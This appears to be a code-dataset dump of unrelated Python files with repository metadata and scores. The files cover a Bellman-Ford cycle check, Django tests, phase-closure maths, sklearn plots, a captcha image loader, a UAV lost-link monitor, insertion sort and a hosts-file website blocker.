The class represents a data type for detecting the negative-weight cycle for
single-source shortest paths problem in edge-weighted digraphs.
It returns True if no negative-weight cycle if detected or False if a negative
cycle reachable from the source vertex.
NOTE: The edge weights can be positive, negative, or zero.
"""
def __init__(self, G: Digraph, source: DGVertex):
self._bellman_ford(G, source)
def _bellman_ford(self, G: Digraph, source: DGVertex) -> bool:
"""Check whether the given digraph has negative-weight cycle or not.
Args:
G (Digraph): A directed graph.
source (DGVertex): a special vertex for directed graph.
Returns:
bool: True if no negative-weight cycle reachable from source,
False otherwise.
"""
source.distance = 0
for _ in range(G.V() - 1):
for u in G:
for v in u.neighbors():
self.relax(u, v)
# Check for negative-weight cycles
for u in G:
for v in u.neighbors():
if v.distance > u.distance + u.adj[v]:
return False
return True
def relax(self, u, v):
"""Relax the edge between u and v and update distance of v.
Args:
u: a vertex, predecessor of v
v: a vertex, decendent of u
"""
# Shortest distane so far: ∂(s, v) = distance[u] + u_v_weight
if v.distance > u.distance + u.adj[v]:
v.distance = u.distance + u.adj[v]
v.parent = u
| en | 0.77365 | The class represents a data type for detecting the negative-weight cycle for single-source shortest paths problem in edge-weighted digraphs. It returns True if no negative-weight cycle if detected or False if a negative cycle reachable from the source vertex. NOTE: The edge weights can be positive, negative, or zero. Check whether the given digraph has negative-weight cycle or not. Args: G (Digraph): A directed graph. source (DGVertex): a special vertex for directed graph. Returns: bool: True if no negative-weight cycle reachable from source, False otherwise. # Check for negative-weight cycles Relax the edge between u and v and update distance of v. Args: u: a vertex, predecessor of v v: a vertex, decendent of u # Shortest distane so far: ∂(s, v) = distance[u] + u_v_weight | 2.937049 | 3 |
coman/_version.py | wietsedv/poco | 1 | 6623907 | from pkg_resources import get_distribution
# Resolve the installed package's version from setuptools metadata so the
# version string lives in exactly one place (the package installation).
__version__ = get_distribution("coman").version
| from pkg_resources import get_distribution
__version__ = get_distribution("coman").version
| none | 1 | 1.263042 | 1 | |
companies/tests.py | buketkonuk/pythondotorg | 911 | 6623908 | <filename>companies/tests.py
from django.test import TestCase
from . import admin # coverage FTW
from .templatetags.companies import render_email
class CompaniesTagsTests(TestCase):
    """Unit tests for the `companies` template tags."""

    def test_render_email(self):
        # Empty input yields no markup at all.
        self.assertEqual(render_email(''), None)
        # NOTE(review): '<EMAIL>' is an anonymized fixture; the expected output
        # implies the original was '<EMAIL>' obfuscated
        # with <span> separators around '.' and '@' — confirm against the tag.
        self.assertEqual(render_email('<EMAIL>'), 'firstname<span>.</span>lastname<span>@</span>domain<span>.</span>com')
| <filename>companies/tests.py
from django.test import TestCase
from . import admin # coverage FTW
from .templatetags.companies import render_email
class CompaniesTagsTests(TestCase):
def test_render_email(self):
self.assertEqual(render_email(''), None)
self.assertEqual(render_email('<EMAIL>'), 'firstname<span>.</span>lastname<span>@</span>domain<span>.</span>com')
| en | 0.985351 | # coverage FTW | 2.148752 | 2 |
applications/least_norm.py | rbiessel/CovSAR | 1 | 6623909 | import numpy as np
from matplotlib import pyplot as plt
def least_norm(A, closures, pinv=False):
    '''
    Solve A x = closures for the minimum-norm phase vector x.

    With pinv=True the Moore-Penrose pseudoinverse is used; otherwise the
    normal-equations form x = A^T (A A^T)^-1 b is evaluated directly.
    '''
    if pinv:
        return np.linalg.pinv(A) @ closures
    gram_inverse = np.linalg.inv(A @ A.T)
    return A.T @ (gram_inverse @ closures)
def get_closures(A, phi):
    '''
    Form the vector of phase closures from complex phases, e.g.
    xi = phi_12 + phi_23 - phi_13 for a single triplet row of A.
    '''
    phases = np.angle(phi)
    return A @ phases
# Vector of phases with zero phase closure errors (0.5 + 0.5 - 1 = 0)
closed = np.exp(1j * np.array([0.5, 1, 0.5]))
# Vector of phases with non-zero closure errors: 0.1 rad added to two phases
# so the triplet closure 0.5 + 0.6 - 1.1 = 0 no longer holds element-wise.
unclosed = np.exp(1j * np.array([0.5, 1 + 0.1, 0.5 + 0.1]))
def main(phis):
    """Demonstrate least-norm phase recovery on *phis*: derive the triplet
    closures, solve for the minimum-norm phase vector, and plot the observed,
    least-norm, and corrected phases."""
    ind = np.array([1, 2, 3])
    A = np.array([[1, -1, 1]])
    # Phases to phase closures
    closures = get_closures(A, phis)
    # Phase closures back to phases
    least_norm_phi = least_norm(A, closures)
    print('Phase closures: ', closures)
    # Bug fix: the original plotted the module-level `closed` vector, ignoring
    # the `phis` argument entirely.
    plt.plot(ind, np.angle(phis), label='observed phases')
    plt.plot(ind, np.angle(least_norm_phi), label='least norm phases ')
    # Bug fix: the original multiplied complex phasors by the *real* angle
    # vector; converting the least-norm phases to phasors first subtracts
    # them from the observed phases as intended.
    plt.plot(ind, np.angle(phis * np.exp(-1j * least_norm_phi)),
             label='Corrected Phases')
    plt.legend(loc='lower left')
    plt.show()

main(unclosed)
| import numpy as np
from matplotlib import pyplot as plt
def least_norm(A, closures, pinv=False):
'''
Solve: Ax = b
Find the minimum norm vector 'x' of phases that can explain 'b' phase closures
'''
if pinv:
return np.linalg.pinv(A) @ closures
return A.T @ np.linalg.inv(A @ A.T) @ closures
def get_closures(A, phi):
'''
Use matrix mult to generate vector of phase closures such that
the angle xi = phi_12 + phi_23 - phi_13
'''
return A @ np.angle(phi)
# Vector of phases with zero phase closure errors
closed = np.exp(1j * np.array([0.5, 1, 0.5]))
# Vector of phases with non-zero closure errors
unclosed = np.exp(1j * np.array([0.5, 1 + 0.1, 0.5 + 0.1]))
def main(phis):
ind = np.array([1, 2, 3])
A = np.array([[1, -1, 1]])
# Phases to phase closures
closures = get_closures(A, phis)
# Phase closures back to phases
least_norm_phi = least_norm(A, closures)
print('Phase closures: ', closures)
plt.plot(ind, np.angle(closed), label='observed phases')
plt.plot(ind, np.angle(least_norm_phi), label='least norm phases ')
plt.plot(ind, np.angle(closed * least_norm_phi.conj()),
label='Corrected Phases')
plt.legend(loc='lower left')
plt.show()
main(unclosed)
| en | 0.876257 | Solve: Ax = b Find the minimum norm vector 'x' of phases that can explain 'b' phase closures Use matrix mult to generate vector of phase closures such that the angle xi = phi_12 + phi_23 - phi_13 # Vector of phases with zero phase closure errors # Vector of phases with non-zero closure errors # Phases to phase closures # Phase closures back to phases | 3.206147 | 3 |
wumpus/models/embed.py | jay3332/wumpus.py | 4 | 6623910 | from dataclasses import dataclass
from typing import List, Optional
from .objects import Timestamp
from ..typings import JSON
from ..typings.payloads import (
EmbedPayload,
EmbedAuthorPayload,
EmbedFooterPayload,
EmbedFieldPayload
)
@dataclass
class EmbedField:
    """A single name/value field of an :class:`Embed`.

    Attributes
    ----------
    name: str
        The name of the field.
    value: str
        The value of the field.
    inline: bool
        Whether or not this field should be displayed inline.
    """
    name: str
    value: str
    inline: bool = True

    def to_json(self, /) -> EmbedFieldPayload:
        payload = {
            'name': self.name,
            'value': self.value,
            'inline': self.inline,
        }
        return payload
@dataclass
class EmbedAuthor:
    """Represents the author of an :class:`Embed`.

    Attributes
    ----------
    name: str
        The name of the author.
    url: str
        The redirect URL of the author.
    icon_url: str
        The URL of the author's icon.
    """
    name: str
    url: str
    icon_url: str

    def to_json(self, /) -> "EmbedAuthorPayload":
        # Bug fix: Embed.to_json() calls author.to_json(), which previously
        # did not exist and raised AttributeError at serialization time.
        return {
            'name': self.name,
            'url': self.url,
            'icon_url': self.icon_url,
        }
@dataclass
class EmbedFooter:
    """Represents the footer of an :class:`Embed`.

    Attributes
    ----------
    text: str
        The footer text.
    icon_url: str
        The URL of the footer icon.
    proxy_icon_url: str
        The proxied URL of the footer icon.
    """
    text: str
    icon_url: str
    proxy_icon_url: str

    def to_json(self, /) -> "EmbedFooterPayload":
        # Added for consistency with EmbedField/EmbedAuthor so the footer
        # can be serialized by Embed.to_json().
        return {
            'text': self.text,
            'icon_url': self.icon_url,
            'proxy_icon_url': self.proxy_icon_url,
        }
class Embed:
    """Represents a Discord embed.

    Can be constructed empty or from a raw embed payload dict.
    """

    def __init__(
        self,
        json: JSON = None,
        /,
        **fields
    ):
        # Default every attribute so to_json() works even when no payload
        # was supplied (previously the attributes were simply missing).
        self.title = None
        self.type = 'rich'
        self.description = None
        self.url = None
        self.timestamp = None
        self.color = None
        self.fields = []
        self.author = None
        self.footer = None
        # NOTE(review): **fields is accepted but currently ignored, as in the
        # original — TODO wire keyword construction up.
        if json is not None:
            self._from_json(json)

    def _from_json(self, json: EmbedPayload, /) -> None:
        """Populate this embed from a raw payload dict."""
        self.title: str = json.get('title')
        self.type: str = json.get('type', 'rich')
        self.description: str = json.get('description')
        self.url: str = json.get('url')

        _timestamp = json.get('timestamp')
        # Bug fix: leave timestamp as None when absent instead of leaving the
        # attribute unset (which made to_json() raise AttributeError).
        self.timestamp: Optional[Timestamp] = (
            Timestamp.fromisoformat(_timestamp) if _timestamp is not None else None
        )

        # # TODO: Color class
        self.color: int = json.get('color')
        self.fields: List[EmbedField] = [EmbedField(**field) for field in json.get('fields', [])]

        _author = json.get('author')
        _footer = json.get('footer')
        self.author: Optional[EmbedAuthor] = EmbedAuthor(**_author) if _author is not None else None
        self.footer: Optional[EmbedFooter] = EmbedFooter(**_footer) if _footer is not None else None
        # TODO: The other keys

    def to_json(self) -> EmbedPayload:
        """Serialize this embed back into a raw payload dict."""
        embed = {
            'type': self.type or 'rich',
            'title': self.title,
            'description': self.description,
            'url': self.url,
            'timestamp': self.timestamp.isoformat() if self.timestamp is not None else None,
            'color': self.color,
            'fields': [field.to_json() for field in self.fields],
        }
        # Bug fix: the original dereferenced self.author unconditionally (it
        # may be None) and never returned the dict at all.
        if self.author is not None:
            # Serialized inline; EmbedAuthor is a plain dataclass.
            embed['author'] = {
                'name': self.author.name,
                'url': self.author.url,
                'icon_url': self.author.icon_url,
            }
        if self.footer is not None:
            embed['footer'] = {
                'text': self.footer.text,
                'icon_url': self.footer.icon_url,
                'proxy_icon_url': self.footer.proxy_icon_url,
            }
        return embed
| from dataclasses import dataclass
from typing import List, Optional
from .objects import Timestamp
from ..typings import JSON
from ..typings.payloads import (
EmbedPayload,
EmbedAuthorPayload,
EmbedFooterPayload,
EmbedFieldPayload
)
@dataclass
class EmbedField:
"""Represents a field of an :class:`Embed`.
Attributes
----------
name: str
The name of the field.
value: str
The value of the field.
inline: bool
Whether or not this field should be displayed inline.
"""
name: str
value: str
inline: bool = True
def to_json(self, /) -> EmbedFieldPayload:
return {
'name': self.name,
'value': self.value,
'inline': self.inline
}
@dataclass
class EmbedAuthor:
"""Represents the author of an :class:`Embed`.
Attributes
----------
name: str
The name of the author.
url: str
The redirect URL of the author.
icon_url: str
The URL of the author's icon.
"""
name: str
url: str
icon_url: str
@dataclass
class EmbedFooter:
"""Represents the footer of an :class:`Embed`.
"""
text: str
icon_url: str
proxy_icon_url: str
class Embed:
"""Represents a Discord embed.
"""
def __init__(
self,
json: JSON = None,
/,
**fields
):
if json is not None:
self._from_json(json)
def _from_json(self, json: EmbedPayload, /) -> None:
self.title: str = json.get('title')
self.type: str = json.get('type', 'rich')
self.description: str = json.get('description')
self.url: str = json.get('url')
_timestamp = json.get('timestamp')
if _timestamp is not None:
self.timestamp: Optional[Timestamp] = Timestamp.fromisoformat(_timestamp)
# # TODO: Color class
self.color: int = json.get('color')
self.fields: List[EmbedField] = [EmbedField(**field) for field in json.get('fields', [])]
_author = json.get('author')
_footer = json.get('footer')
self.author: Optional[EmbedAuthor] = EmbedAuthor(**_author) if _author is not None else None
self.footer: Optional[EmbedFooter] = EmbedFooter(**_footer) if _footer is not None else None
# TODO: The other keys
def to_json(self) -> EmbedPayload:
embed = {
'type': self.type or 'rich',
'title': self.title,
'description': self.description,
'url': self.url,
'timestamp': self.timestamp.isoformat() if self.timestamp is not None else None,
'color': self.color,
'author': self.author.to_json()
}
| en | 0.540759 | Represents a field of an :class:`Embed`. Attributes ---------- name: str The name of the field. value: str The value of the field. inline: bool Whether or not this field should be displayed inline. Represents the author of an :class:`Embed`. Attributes ---------- name: str The name of the author. url: str The redirect URL of the author. icon_url: str The URL of the author's icon. Represents the footer of an :class:`Embed`. Represents a Discord embed. # # TODO: Color class # TODO: The other keys | 3.001357 | 3 |
CaptchaBreaker_cmd/load.py | alstjgg/captcha_image_preprocess | 2 | 6623911 | import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
    """Download an image from the given URL and return it as a grayscale array.

    :param link: URL where the image is located
    :return: grayscale image downloaded from the URL
    :raises requests.HTTPError: when the server responds with an error status
    """
    req = requests.get(link)
    try:
        req.raise_for_status()
    except Exception as exc:
        print('There was a problem: %s' % exc)
        # Bug fix: previously execution fell through and tried to decode the
        # HTTP error body as an image; re-raise so get_image() can fall back
        # to treating the argument as a filesystem path.
        raise
    loaded_image = cv2.imdecode(np.asarray(bytearray(req.content)), 1)
    loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
    return loaded_image
# Get image from external file(path)
def get_image_path(path):
    """Load an image from a local file and return it with its label.

    :param path: filesystem path of the stored image
    :return: (grayscale image, label) where the label is the file's base name
             without extension
    """
    grayscale = cv2.cvtColor(cv2.imread(path), cv2.COLOR_BGR2GRAY)
    filename = path.split('/')[-1].split('\\')[-1]
    label = filename.split('.')[0]
    return grayscale, label
# Determine if input is link or path & return image
def get_image(which):
    """Load an image from either a URL or a local path.

    Tries to treat *which* as a URL first; on any failure falls back to
    treating it as a filesystem path.

    :param which: URL or path of the image
    :return: grayscale image, or None if both attempts fail
    """
    try:
        return get_image_link(which)
    except Exception:
        # Not a (reachable) URL — fall through to the path branch.
        pass
    try:
        image, _label = get_image_path(which)
        return image
    except Exception:
        print('Load error. Try again')
        # Explicit None keeps the failure mode of the original (implicit None)
        # while making it obvious to readers.
        return None
| import requests
import cv2
import numpy as np
# Download captcha images from link and save
def get_image_link(link):
"""Download image from given url.
:param link: given url where image is located
:return: image downloaded from url
"""
req = requests.get(link)
try:
req.raise_for_status()
except Exception as exc:
print('There was a problem: %s' % exc)
loaded_image = req.content
loaded_image = cv2.imdecode(np.asarray(bytearray(loaded_image)), 1)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
return loaded_image
# Get image from external file(path)
def get_image_path(path):
"""Load image from local directory.
:param path: given path where image is stored
:return: image loaded from directory
"""
loaded_image = cv2.imread(path)
loaded_image = cv2.cvtColor(loaded_image, cv2.COLOR_BGR2GRAY)
label = ((path.split('/')[-1]).split('\\')[-1]).split('.')[0]
return loaded_image, label
# Determine if input is link or path & return image
def get_image(which):
"""Decide if parameter is a link or directory, and load image from it.
:param which: link or directory to where image is located
:return: image pulled from link or directory
"""
try:
image = get_image_link(which)
return image
except:
try:
image, label = get_image_path(which)
return image
except:
print('Load error. Try again')
| en | 0.896329 | # Download captcha images from link and save Download image from given url. :param link: given url where image is located :return: image downloaded from url # Get image from external file(path) Load image from local directory. :param path: given path where image is stored :return: image loaded from directory # Determine if input is link or path & return image Decide if parameter is a link or directory, and load image from it. :param which: link or directory to where image is located :return: image pulled from link or directory | 3.219502 | 3 |
visualize_graph_model_performance.py | dimitermilev/ML_predict_hospitalization_risk_ED_pts | 0 | 6623912 | from sklearn.metrics import confusion_matrix, precision_score, recall_score, precision_recall_curve,f1_score, fbeta_score
import seaborn as sns
from matplotlib import pyplot as plt
%matplotlib inline
def graph_roc(data, features, optimal_feature_num, model, title):
    '''Plot the ROC curve for *model* on the held-out test split and print its AUC.

    NOTE(review): assumes split_data (defined elsewhere) returns
    (X_train, X_train_sc, X_test, X_test_sc, y_train, y_test) — confirm.
    '''
    # Bug fix: roc_curve / roc_auc_score were never imported at module level
    # (the top-of-file sklearn.metrics import omits them), so this function
    # raised NameError. Imported locally to keep the fix self-contained.
    from sklearn.metrics import roc_curve, roc_auc_score
    X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
    # Hoisted: predict_proba was computed twice on the same test set.
    positive_probs = model.predict_proba(X_test)[:, 1]
    fpr, tpr, thresholds = roc_curve(y_test, positive_probs)
    plt.plot(fpr, tpr, lw=2)
    plt.plot([0, 1], [0, 1], c='violet', ls='--')
    plt.xlim([-0.05, 1.05])
    plt.ylim([-0.05, 1.05])
    plt.xlabel('False positive rate')
    plt.ylabel('True positive rate')
    plt.title('ROC curve');
    print(f"{title} ROC AUC score = ", roc_auc_score(y_test, positive_probs))
def make_confusion_matrix(data, features, optimal_feature_num, model, threshold=0.5):
    '''Render a confusion-matrix heat map for *model* on the test split.

    The decision threshold on predict_proba's positive class is adjustable
    via *threshold* (default 0.5).
    '''
    X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
    positive_probs = model.predict_proba(X_test)[:, 1]
    y_predict = positive_probs >= threshold
    hosp_confusion = confusion_matrix(y_test, y_predict)
    class_labels = ['Discharged', 'Hospitalized']
    plt.figure(dpi=80)
    sns.heatmap(hosp_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',
                xticklabels=class_labels,
                yticklabels=class_labels);
    plt.xlabel('prediction')
    plt.ylabel('actual')
def make_precision_recall_curves(data, features, optimal_feature_num, model):
    '''Plot precision and recall as functions of the decision threshold.'''
    X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
    positive_probs = model.predict_proba(X_test)[:, 1]
    precision_curve, recall_curve, threshold_curve = precision_recall_curve(y_test, positive_probs)
    plt.figure(dpi=80)
    # precision/recall arrays are one element longer than thresholds; drop
    # the first entry of each so the x/y lengths match.
    for curve, curve_label in ((precision_curve, 'precision'), (recall_curve, 'recall')):
        plt.plot(threshold_curve, curve[1:], label=curve_label)
    plt.legend(loc='lower left')
    plt.xlabel('Threshold (above this probability, label as hospitalization)');
    plt.title('Precision and Recall Curves');
| from sklearn.metrics import confusion_matrix, precision_score, recall_score, precision_recall_curve,f1_score, fbeta_score
import seaborn as sns
from matplotlib import pyplot as plt
%matplotlib inline
def graph_roc(data, features, optimal_feature_num, model, title):
'''Build a ROC AUC curve graph with matplotlib'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
fpr, tpr, thresholds = roc_curve(y_test, model.predict_proba(X_test)[:,1])
plt.plot(fpr, tpr,lw=2)
plt.plot([0,1],[0,1],c='violet',ls='--')
plt.xlim([-0.05,1.05])
plt.ylim([-0.05,1.05])
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve');
print(f"{title} ROC AUC score = ", roc_auc_score(y_test, model.predict_proba(X_test)[:,1]))
def make_confusion_matrix(data, features, optimal_feature_num, model, threshold=0.5):
'''Build confusion matrix with seaborn. Leverage the predict_proba function of models to adjust threshold'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
y_predict = (model.predict_proba(X_test)[:, 1] >= threshold)
hosp_confusion = confusion_matrix(y_test, y_predict)
plt.figure(dpi=80)
sns.heatmap(hosp_confusion, cmap=plt.cm.Blues, annot=True, square=True, fmt='d',
xticklabels=['Discharged', 'Hospitalized'],
yticklabels=['Discharged', 'Hospitalized']);
plt.xlabel('prediction')
plt.ylabel('actual')
def make_precision_recall_curves(data, features, optimal_feature_num, model):
'''Plot precision and recall curves for desired model'''
X_train, X_train_sc, X_test, X_test_sc, y_train, y_test = split_data(data, features, optimal_feature_num)
precision_curve, recall_curve, threshold_curve = precision_recall_curve(y_test, model.predict_proba(X_test)[:,1] )
plt.figure(dpi=80)
plt.plot(threshold_curve, precision_curve[1:],label='precision')
plt.plot(threshold_curve, recall_curve[1:], label='recall')
plt.legend(loc='lower left')
plt.xlabel('Threshold (above this probability, label as hospitalization)');
plt.title('Precision and Recall Curves');
| en | 0.792006 | Build a ROC AUC curve graph with matplotlib Build confusion matrix with seaborn. Leverage the predict_proba function of models to adjust threshold Plot precision and recall curves for desired model | 2.85413 | 3 |
src/mission/task/lost_link.py | AuraUAS/aura-core | 8 | 6623913 | <reponame>AuraUAS/aura-core
# lost_link.py: monitors messages from the ground station and flags an
# alert when too much time has elapsed since the last received
# message. If airborne at this time, request the circle home task
# which sends the aircraft home to circle. The operator much chose
# the next course of action after link is successfully resumed.
# Otherwise the assumption is that once returned home and circling,
# the operator could take over manual control and land the aircraft
# manually.
import mission.mission_mgr
from PropertyTree import PropertyNode
import comms.events
from mission.task.task import Task
class LostLink(Task):
    """Monitors ground-station traffic and, on link timeout while airborne,
    requests the circle-home task. Recovery after the link resumes is left
    to the operator."""

    def __init__(self, config_node):
        Task.__init__(self)
        self.status_node = PropertyNode("/status")
        self.task_node = PropertyNode("/task")
        self.home_node = PropertyNode("/task/home")
        self.targets_node = PropertyNode("/autopilot/targets")
        self.remote_link_node = PropertyNode("/comms/remote_link")
        self.remote_link_node.setString("link", "inactive")
        self.link_state = False
        self.push_task = ""
        self.name = config_node.getString("name")
        self.timeout_sec = config_node.getDouble("timeout_sec")
        if self.timeout_sec < 1.0:
            # set a sane default if none provided
            # Bug fix: this was misspelled 'timetout_sec', so the default was
            # never applied and an unconfigured timeout stayed < 1.0 sec.
            self.timeout_sec = 60.0

    def activate(self):
        self.active = True
        comms.events.log("comms", "lost link monitor started")

    def update(self, dt):
        if not self.active:
            return

        # FIXME: this needs to be fleshed out a *lot* more in the future
        # with more flexible options.  FIXME: what about a sensible
        # fallback in case we can't find the push_task or other desired
        # actions?

        last_message_sec = self.remote_link_node.getDouble("last_message_sec")
        if last_message_sec < 0.00001:
            # likely zero, likely never received a message from GCS yet
            return

        current_time = self.status_node.getDouble("frame_time")
        message_age = current_time - last_message_sec
        if message_age > self.timeout_sec:
            # lost link state
            if self.link_state:
                self.link_state = False
                self.remote_link_node.setString("link", "lost")
                comms.events.log("comms", "link timed out (lost) last_message=%.1f timeout_sec=%.1f" % (last_message_sec, self.timeout_sec))
                # do lost link action here (iff airborne)
                if self.task_node.getBool("is_airborne"):
                    comms.events.log("lost_link", "circle home")
                    mission.mission_mgr.m.request_task_home()
                    # sanity check on transit altitude (boost to 200'
                    # agl if below that)
                    target_agl = self.targets_node.getDouble("altitude_agl_ft")
                    if target_agl < 200.0:
                        self.targets_node.setDouble("altitude_agl_ft", 200.0)
        else:
            # good link state
            if not self.link_state:
                self.link_state = True
                self.remote_link_node.setString("link", "ok")
                comms.events.log("comms", "link ok")
                # Note: don't take any action when/if link resumes
                # (simply continue with circle home task).  Operator
                # decision/action required for next steps.

    def is_complete(self):
        # Monitoring task: never self-terminates.
        return False

    def close(self):
        self.active = False
        return True
| # lost_link.py: monitors messages from the ground station and flags an
# alert when too much time has elapsed since the last received
# message. If airborne at this time, request the circle home task
# which sends the aircraft home to circle. The operator much chose
# the next course of action after link is successfully resumed.
# Otherwise the assumption is that once returned home and circling,
# the operator could take over manual control and land the aircraft
# manually.
import mission.mission_mgr
from PropertyTree import PropertyNode
import comms.events
from mission.task.task import Task
class LostLink(Task):
def __init__(self, config_node):
Task.__init__(self)
self.status_node = PropertyNode("/status")
self.task_node = PropertyNode("/task")
self.home_node = PropertyNode("/task/home")
self.targets_node = PropertyNode("/autopilot/targets")
self.remote_link_node = PropertyNode("/comms/remote_link")
self.remote_link_node.setString("link", "inactive")
self.link_state = False
self.push_task = ""
self.name = config_node.getString("name")
self.timeout_sec = config_node.getDouble("timeout_sec")
if self.timeout_sec < 1.0:
# set a sane default if none provided
self.timetout_sec = 60.0
def activate(self):
self.active = True
comms.events.log("comms", "lost link monitor started")
def update(self, dt):
if not self.active:
return
# FIXME: this needs to be fleshed out a *lot* more in the future
# with more flexible options. FIXME: what about a sensible
# fallback in case we can't find the push_task or other desired
# actions?
last_message_sec = self.remote_link_node.getDouble("last_message_sec")
if last_message_sec < 0.00001:
# likely zero, likely never received a message from GCS yet
return
current_time = self.status_node.getDouble("frame_time")
message_age = current_time - last_message_sec
# print "update lost link task, msg age = %.1f timeout=%.1f" % \
# (message_age, self.timeout_sec)
if message_age > self.timeout_sec:
# lost link state
if self.link_state:
self.link_state = False
self.remote_link_node.setString("link", "lost")
comms.events.log("comms", "link timed out (lost) last_message=%.1f timeout_sec=%.1f" % (last_message_sec, self.timeout_sec))
# do lost link action here (iff airborne)
if self.task_node.getBool("is_airborne"):
comms.events.log("lost_link", "circle home")
mission.mission_mgr.m.request_task_home()
# sanity check on transit altitude (boost to 200'
# agl if below that)
target_agl = self.targets_node.getDouble("altitude_agl_ft")
if target_agl < 200.0:
self.targets_node.setDouble("altitude_agl_ft", 200.0)
else:
# good link state
if not self.link_state:
self.link_state = True
self.remote_link_node.setString("link", "ok")
comms.events.log("comms", "link ok")
# Note: don't take any action when/if link resumes
# (simply continue with circle home task). Operator
# decision/action required to for next steps.
def is_complete(self):
return False
def close(self):
self.active = False
return True | en | 0.880181 | # lost_link.py: monitors messages from the ground station and flags an # alert when too much time has elapsed since the last received # message. If airborne at this time, request the circle home task # which sends the aircraft home to circle. The operator much chose # the next course of action after link is successfully resumed. # Otherwise the assumption is that once returned home and circling, # the operator could take over manual control and land the aircraft # manually. # set a sane default if none provided # FIXME: this needs to be fleshed out a *lot* more in the future # with more flexible options. FIXME: what about a sensible # fallback in case we can't find the push_task or other desired # actions? # likely zero, likely never received a message from GCS yet # print "update lost link task, msg age = %.1f timeout=%.1f" % \ # (message_age, self.timeout_sec) # lost link state # do lost link action here (iff airborne) # sanity check on transit altitude (boost to 200' # agl if below that) # good link state # Note: don't take any action when/if link resumes # (simply continue with circle home task). Operator # decision/action required to for next steps. | 2.714616 | 3 |
hackerrank/domain/algorithms/sorting/running_time.py | spradeepv/dive-into-python | 0 | 6623914 | <gh_stars>0
"""
"""
def insertionSort(ar):
    """Insertion-sort *ar* in place; print and return the number of shifts.

    The printed count matches HackerRank's 'running time' metric: the number
    of element moves performed while sorting.
    """
    running_time = 0
    # range() handles empty and single-element lists, fixing the original's
    # IndexError (it read ar[1] before checking the length).
    for index in range(1, len(ar)):
        num = ar[index]
        for i in range(index - 1, -1, -1):
            if num < ar[i]:
                ar[i + 1], ar[i] = ar[i], num
                running_time += 1
            else:
                # The prefix is already sorted, so no earlier element can
                # exceed num; stop scanning (the original wasted O(n) here).
                break
    # print() with a single argument behaves identically on Python 2 and 3
    # (the original 'print running_time' statement was Python-2 only).
    print(running_time)
    return running_time
# Read the (unused) element count, then the space-separated array, and sort.
m = input()
# NOTE(review): raw_input exists only on Python 2 — this script predates
# Python 3 and will not run unmodified on it.
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar)
"""
def insertionSort(ar):
length = len(ar)
stop = False
index = 1
running_time = 0
while not stop:
num = ar[index]
for i in range(index - 1, -1, -1):
if num < ar[i]:
ar[i + 1], ar[i] = ar[i], num
running_time += 1
index += 1
if index == length:
stop = True
print running_time
m = input()
ar = [int(i) for i in raw_input().strip().split()]
insertionSort(ar) | none | 1 | 3.693583 | 4 | |
beproductive/blocker.py | JohannesStutz/beproductive | 2 | 6623915 | # AUTOGENERATED! DO NOT EDIT! File to edit: 01_blocker.ipynb (unless otherwise specified).
__all__ = ['APP_NAME', 'REDIRECT', 'WIN_PATH', 'LINUX_PATH', 'NOTIFY_DURATION', 'ICON_PATH', 'host_fp', 'host_fp_copy',
'host_fp_blocked', 'Blocker']
# Cell
from pathlib import Path
from shutil import copy
import beproductive.config as config
import sys
try:
from win10toast import ToastNotifier
win_notify = ToastNotifier()
except:
win_notify = False
# Cell
APP_NAME = 'Be Productive'
# Loopback address blocked hostnames are redirected to.
REDIRECT = '127.0.0.1'
WIN_PATH = r'C:\Windows\System32\drivers\etc'
LINUX_PATH = r'/etc'
NOTIFY_DURATION = 5 # seconds the desktop toast notification stays visible
ICON_PATH = 'icon.ico'
# Pick the platform-appropriate directory containing the hosts file.
if sys.platform == 'win32':
    host_path = Path(WIN_PATH)
else:
    host_path = Path(LINUX_PATH)
host_fp = host_path/'hosts'                     # live hosts file used by the OS
host_fp_copy = host_path/'hosts.original'       # pristine backup made at first run
host_fp_blocked = host_path/'hosts.blocked'     # backup + redirect entries
# Cell
class Blocker():
    "The core of the package. It modifies the hosts file of the OS."
    # Swapping the system hosts file between a pristine copy and a copy with
    # redirect entries requires administrator/root privileges; every file
    # operation therefore guards against PermissionError.
    def __init__(self, redirect=REDIRECT):
        # True only once _create_blocked_list() succeeds, i.e. we could write
        # to the hosts directory.
        self.adminrights = False
        self.redirect = redirect
        # List of hostnames to block, loaded from the user's config.
        self.blocklist = config.load_config()
        if not host_fp_copy.exists():
            self._setup()
        if self._create_blocked_list():
            self.adminrights = True
    def _setup(self):
        "Creates a copy of the `hosts` file and saves it as `hosts.original`"
        try:
            copy(host_fp, host_fp_copy)
            self.notify("Setup successful")
        except PermissionError:
            self._raise_permission_error()
    def _create_blocked_list(self):
        "Creates a copy of `hosts.original` and saves it to `hosts.blocked`. Then adds all blocked sites."
        # Returns True on success, False when lacking write permission.
        try:
            copy(host_fp_copy, host_fp_blocked)
            with open(host_fp_blocked, "a") as blocked_file:
                for url in self.blocklist:
                    # TODO: refine, add www only if not in url, remove www if in url
                    blocked_file.write(f"{self.redirect} {url} www.{url} api.{url}\n")
                    # Special case for Twitter which has a special API URL
                    if url == 'twitter.com':
                        blocked_file.write(f"{self.redirect} tpop-api.twitter.com\n")
            return True
        except PermissionError:
            self._raise_permission_error()
            return False
    def block(self, notify=False):
        "Blocks all specified websites by replacing `hosts` file with `hosts.blocked`"
        # Returns a status string on success, False on permission failure.
        try:
            copy(host_fp_blocked, host_fp)
        except PermissionError:
            self._raise_permission_error()
            return False
        if notify:
            self.notify("Websites blocked, enjoy your work.")
        return "Websites blocked"
    def unblock(self, notify=False):
        "Unblocks all websites by restoring the original `hosts` file"
        # Returns a status string on success, False on permission failure.
        try:
            copy(host_fp_copy, host_fp)
        except PermissionError:
            self._raise_permission_error()
            return False
        if notify:
            self.notify("All websites unblocked.")
        return "Websites unblocked"
